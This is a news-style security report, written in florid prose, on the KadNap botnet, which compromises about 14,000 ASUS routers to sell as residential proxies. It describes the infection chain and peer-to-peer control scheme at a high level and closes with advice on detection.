Shadow of the Router: How the “KadNap” Botnet Hijacked 14,000 ASUS Devices

The Black Lotus Labs vanguard at Lumen Technologies has unearthed a nascent botnet christened KadNap, operational since August 2025. KadNap ruthlessly infects ASUS routers and auxiliary edge networking hardware, transmuting these devices into proxy conduits for malignant traffic. In a mere span of months, this digital web has metastasized to encompass approximately 14,000 nodes, integrating into a sprawling infrastructure that cybercriminals weaponize to cloak their kinetic offensives and circumvent defensive blockades.

These compromised nodes coalesce into a peer-to-peer network, communing with the overarching command-and-control infrastructure via a mutated iteration of the Kademlia distributed hash table protocol. This labyrinthine architecture profoundly complicates the unmasking of the orchestrating servers, as the operational telemetry is fractured and distributed across the network’s constituency, with each node harboring but a mere fragment of the total intelligence.

Approximately half of the subjugated appliances remain tethered to command servers dedicated to servicing bots entrenched within ASUS routing hardware. The residual nodes tether themselves to a twain of disparate command nexuses. The paramount concentration of compromised systems resides within the United States—constituting roughly 60 percent of the entire network’s mass. Substantial contingents are simultaneously distributed across the digital territories of Taiwan, Hong Kong, and Russia.

The infection sequence is catalyzed by the clandestine ingestion of a venomous script, designated aic.sh, from a remote repository. This script deeply entrenches itself within the host architecture via a cron scheduling directive, programmed to detonate every 55 minutes. Subsequently, the compromised appliance downloads an ELF executable dubbed kad, which systematically installs the KadNap client. Upon ignition, the software ascertains the device’s external IP coordinate and simultaneously petitions a constellation of Network Time Protocol (NTP) servers to harvest the precise chronological epoch and systemic uptime telemetry.

To ensure profound operational stealth, KadNap deploys its adulterated manifestation of the Kademlia protocol. Navigating this distributed web, the malignant software hunts for kindred nodes to extract the coordinates of the command infrastructure, a maneuver that severely confounds orthodox network surveillance and interdiction efforts. Nevertheless, forensic savants discerned a critical idiosyncrasy within its execution: prior to communing with the command nexuses, the subjugated devices routinely establish connections with a pair of immutable, hardcoded nodes. This glaring architectural flaw significantly dilutes the network’s decentralized nature, thereby providing investigators a vital aperture to illuminate the command infrastructure’s concealed elements.

Rigorous forensic analysis has unveiled an undeniable tether between KadNap and the Doppelganger proxy syndicate. According to the intelligence gathered by Lumen Technologies, this service may very well be a rebranded iteration of the Faceless platform, an entity historically intertwined with “TheMoon” botnet—a digital leviathan that similarly preyed upon ASUS routing infrastructure. This clandestine platform peddles access to the subjugated hardware, marketing them as “residential” proxies. By funneling their traffic through these hijacked conduits, malefactors effectively mask the true provenance of their kinetic assaults and effortlessly bypass geographic or IP-based blockades.

Such weaponized proxies are frequently harnessed to orchestrate Distributed Denial of Service (DDoS) bombardments, exhaustive password brute-forcing campaigns, and colossal credential stuffing operations. In these harrowing scenarios, the venomous digital activity appears to emanate directly from the innocent, compromised appliances.

The architects of this dossier vehemently counsel network administrators to maintain a hyper-vigilant posture against anomalous cron directives, rhythmic connections to enigmatic external nodes, and the surreptitious downloading of dubious artifacts onto edge networking hardware. Such forensic footprints serve as glaring harbingers of the KadNap client’s parasitic presence. The proactive auditing of infrastructure and the draconian interdiction of suspicious network conduits are paramount to curtailing the proliferation of infected devices and profoundly crippling the botnet’s operational efficacy.